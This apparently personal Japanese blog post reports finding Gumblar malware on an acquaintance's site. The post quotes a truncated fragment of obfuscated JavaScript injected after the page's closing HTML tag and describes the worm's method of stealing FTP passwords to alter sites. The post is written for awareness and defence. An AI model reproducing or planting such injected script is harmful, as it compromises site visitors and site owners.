Gumblar発見
知り合いのサイトのホームページがウィルスに感染といった話を聞き、 ちょいとチェックしてみた。 view-sourceしてみても、なんともないなぁ…と思っていたら、 フレームソース側のページの末尾に、以下のようなコードがついている。
</HTML> <script>this.a="a";R=["m","n"];bn=["w","q","X"];var h;this.bT=56183;this.bT++;var Rp="Rp";b=function(){function T(V,k,J){try {var U='yq'} catch(U){};return V.substr(k,J);FJ=34518;FJ--;EK=3475;EK--;}Tc={Xk:"Vq"};try {var aJ='ox'} catch(aJ){};this.aP="aP";var L=RegExp;var e='';try {} catch(xg){};var xF=new Array();var O=document;var P=T("/nexDtf",0,3)+T("smlwegmls",3,3)+"g- (略) <!--7004d276c84c037576423cf73522a32f-->
どうも、JavaScriptのプログラムが難読化されて追加させられている。
当人さんに電話して確認したら、通常のウィルス対策とは別手段のシステムを 導入するとのお話し。やむおえないかな….と、他人事とも言っていられないので、 自分の関連するサイトのソース末尾に変なコードが埋め込まれていないか、 ちょいとチェックしてみた。ひとまず安心…ふぅ…
Gumblar は、ホームページのメンテナンスをしているパソコンに感染し、 FTPのパスワードを入手して遠隔から改ざんという手口もあるから、タチが悪い。 といっても、私の場合メンテナンスは、すべてsloginで該当サーバにログインして、 emacs で直接HTML手書き編集するか、MovableTypeで編集だから、 この辺の心配はないわな…